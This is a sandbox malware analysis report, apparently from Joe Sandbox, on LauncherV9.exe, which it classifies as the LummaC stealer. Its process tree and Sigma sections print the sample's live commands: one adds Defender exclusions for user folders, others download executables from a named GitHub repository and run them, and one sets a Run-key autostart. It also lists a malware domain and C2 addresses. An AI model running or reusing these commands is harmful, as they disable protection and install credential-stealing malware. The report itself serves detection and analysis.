Edit tour

Windows Analysis Report
LauncherV9.exe

Overview

General Information

Sample name:	LauncherV9.exe
Analysis ID:	1639444
MD5:	7cebc9159f619bc1d7fe80abb796da26
SHA1:	744b8bacd5ab94de1a20730caf055ca46e2ebbba
SHA256:	8e74a11159a720f1bc4fd09057c2191b28b6935df09d502298d698a65df22a18
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

Adds a directory exclusion to Windows Defender

Contains functionality to determine the online IP of the system

Found API chain indicative of debugger detection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

PE file has nameless sections

Powershell drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Invoke-WebRequest Execution

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Tries to resolve many domain names, but no domain seems valid

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

LauncherV9.exe (PID: 8004 cmdline: "C:\Users\user\Desktop\LauncherV9.exe" MD5: 7CEBC9159F619BC1D7FE80ABB796DA26)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7996 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'" MD5: 04029E121A0CFA5991749937DD22A1D9)

WmiPrvSE.exe (PID: 8028 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 7268 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 4476 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)

jaclo.exe (PID: 6128 cmdline: "C:\zjxbeopkqt\jaclo.exe" MD5: 64FAB8A4DDC5B5EC7497FB6C72017CAE)

cmd.exe (PID: 1224 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7976 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)

dll.exe (PID: 8252 cmdline: "C:\Users\user\AppData\Local\dll.exe" MD5: 7D2EDC5B91D2913419A25D277E31DCD0)

cmd.exe (PID: 8260 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 8284 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)

Service.exe (PID: 8752 cmdline: "C:\Users\user\AppData\Local\Service.exe" MD5: C6063E70D5165D1186696D84A18576B2)

Service.exe (PID: 8908 cmdline: "C:\Users\user\AppData\Local\Service.exe" MD5: C6063E70D5165D1186696D84A18576B2)

Service.exe (PID: 9016 cmdline: "C:\Users\user\AppData\Local\Service.exe" MD5: C6063E70D5165D1186696D84A18576B2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.1472449424.000000000124F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dll.exe PID: 8252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dll.exe PID: 8252	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.jaclo.exe.ba0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", ProcessId: 7268, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", ProcessId: 7320, ProcessName: cmd.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1224, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'", ProcessId: 7976, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Service.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LauncherV9.exe, ProcessId: 8004, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileAutostart

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4476, TargetFilename: C:\zjxbeopkqt\jaclo.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", ProcessId: 7268, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", ProcessId: 7268, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", ProcessId: 7996, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T16:39:12.818021+0100	2028371	3	Unknown Traffic	192.168.2.5	57833	23.197.127.21	443	TCP
2025-03-15T16:39:14.032651+0100	2028371	3	Unknown Traffic	192.168.2.5	57835	23.197.127.21	443	TCP
2025-03-15T16:39:16.665979+0100	2028371	3	Unknown Traffic	192.168.2.5	57837	23.197.127.21	443	TCP
2025-03-15T16:39:17.860354+0100	2028371	3	Unknown Traffic	192.168.2.5	57839	23.197.127.21	443	TCP
2025-03-15T16:39:18.960687+0100	2028371	3	Unknown Traffic	192.168.2.5	57842	104.21.96.1	443	TCP
2025-03-15T16:39:20.527226+0100	2028371	3	Unknown Traffic	192.168.2.5	57848	23.197.127.21	443	TCP
2025-03-15T16:39:21.575616+0100	2028371	3	Unknown Traffic	192.168.2.5	57849	104.21.96.1	443	TCP
2025-03-15T16:39:22.893821+0100	2028371	3	Unknown Traffic	192.168.2.5	57852	23.197.127.21	443	TCP
2025-03-15T16:39:23.977381+0100	2028371	3	Unknown Traffic	192.168.2.5	57854	104.21.96.1	443	TCP
2025-03-15T16:39:25.293974+0100	2028371	3	Unknown Traffic	192.168.2.5	57855	23.197.127.21	443	TCP
2025-03-15T16:39:26.619438+0100	2028371	3	Unknown Traffic	192.168.2.5	57856	104.21.96.1	443	TCP
2025-03-15T16:39:28.312191+0100	2028371	3	Unknown Traffic	192.168.2.5	57857	23.197.127.21	443	TCP
2025-03-15T16:39:29.746152+0100	2028371	3	Unknown Traffic	192.168.2.5	57858	104.21.96.1	443	TCP
2025-03-15T16:39:31.354729+0100	2028371	3	Unknown Traffic	192.168.2.5	57861	23.197.127.21	443	TCP
2025-03-15T16:39:32.963741+0100	2028371	3	Unknown Traffic	192.168.2.5	57862	104.73.234.102	443	TCP
2025-03-15T16:39:34.189424+0100	2028371	3	Unknown Traffic	192.168.2.5	57863	104.73.234.102	443	TCP
2025-03-15T16:39:35.365509+0100	2028371	3	Unknown Traffic	192.168.2.5	57864	104.73.234.102	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP PE File Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T16:39:10.211762+0100	1810003	2	Potentially Bad Traffic	185.199.110.133	443	192.168.2.5	57832	TCP
2025-03-15T16:39:14.056587+0100	1810003	2	Potentially Bad Traffic	185.199.110.133	443	192.168.2.5	57836	TCP
2025-03-15T16:39:18.242010+0100	1810003	2	Potentially Bad Traffic	185.199.110.133	443	192.168.2.5	57841	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T16:39:09.532262+0100	1810000	2	Potentially Bad Traffic	192.168.2.5	57831	140.82.121.4	443	TCP
2025-03-15T16:39:10.211709+0100	1810000	2	Potentially Bad Traffic	192.168.2.5	57832	185.199.110.133	443	TCP
2025-03-15T16:39:13.470342+0100	1810000	2	Potentially Bad Traffic	192.168.2.5	57834	140.82.121.4	443	TCP
2025-03-15T16:39:14.056397+0100	1810000	2	Potentially Bad Traffic	192.168.2.5	57836	185.199.110.133	443	TCP
2025-03-15T16:39:17.634735+0100	1810000	2	Potentially Bad Traffic	192.168.2.5	57838	140.82.121.4	443	TCP
2025-03-15T16:39:18.241928+0100	1810000	2	Potentially Bad Traffic	192.168.2.5	57841	185.199.110.133	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://bugildbett.top/

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\dll.exe	Avira: detection malicious, Label: HEUR/AGEN.1314134
Source: C:\zjxbeopkqt\jaclo.exe	Avira: detection malicious, Label: HEUR/AGEN.1314134

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Service.exe	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\dll.exe	ReversingLabs: Detection: 83%
Source: C:\zjxbeopkqt\jaclo.exe	ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Source: LauncherV9.exe	Virustotal: Detection: 49%			Perma Link
Source: LauncherV9.exe	ReversingLabs: Detection: 38%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038C833 CryptUnprotectData,CryptUnprotectData,	16_2_0038C833
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038BCC0 CryptUnprotectData,	16_2_0038BCC0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038C833 CryptUnprotectData,CryptUnprotectData,	16_2_0038C833

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57864 version: TLS 1.2

Source: LauncherV9.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb source: LauncherV9.exe
Source:	Binary string: \LoaderV2\ClientLoader\x64\Release\ClientLoader.pdb) source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr
Source:	Binary string: C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb5 source: LauncherV9.exe
Source:	Binary string: \LoaderV2\ClientLoader\x64\Release\ClientLoader.pdb source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr

Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74632A334 FindFirstFileExW,		0_2_00007FF74632A334
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C13160 FindFirstFileExW,		22_2_00007FF621C13160

Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx esi, byte ptr [eax+edx-16h]	13_2_00BAEC28
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+175AE18Ah]	13_2_00BEC050
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+esi]	13_2_00BAE99F
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then mov dword ptr [esp], edx	13_2_00BABAA0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+06F294E8h]	13_2_00BAC0B0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1D6A478Ch]	13_2_00BE1CD0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx ebp, word ptr [ecx]	13_2_00BEB010
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_00BD2870
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h	13_2_00BAE865
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movsx ecx, byte ptr [eax+edx]	13_2_00BEA190
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-485B3D16h]	13_2_00BB15FF
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-485B3D1Eh]	13_2_00BCE9E0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx]	13_2_00BCE9E0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then call 00BAFD90h	13_2_00BAF1D7
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000172h]	13_2_00BADD67
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then and edi, 80000000h	13_2_00BABEA0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-485B3D16h]	13_2_00BB1AE5
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	13_2_00BAA2D0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	13_2_00BAA2D0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax+00h]	13_2_00BACED0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	13_2_00BEAAD0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then mov dword ptr [esi], ecx	13_2_00BB2E2C
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movsx ecx, byte ptr [eax+edx]	13_2_00BEA220
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]	13_2_00BE6250
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then mov dword ptr [esi+04h], ecx	13_2_00BB1E4E
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+esi]	13_2_00BD1BB0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+02h]	13_2_00BAC380
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-0704EA1Eh]	13_2_00BCEF70
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+1Dh]	13_2_00BCEF70
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+30h]	13_2_00BCEF50
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]	13_2_00BE2750
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+60h]	13_2_00BE2750
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 4x nop then push edi	13_2_00BB1346
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]	16_2_0038C833
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h	16_2_00391890
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-4926828Eh]	16_2_00391890
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]	16_2_00383143
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	16_2_003BC2A0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	16_2_00382AF8
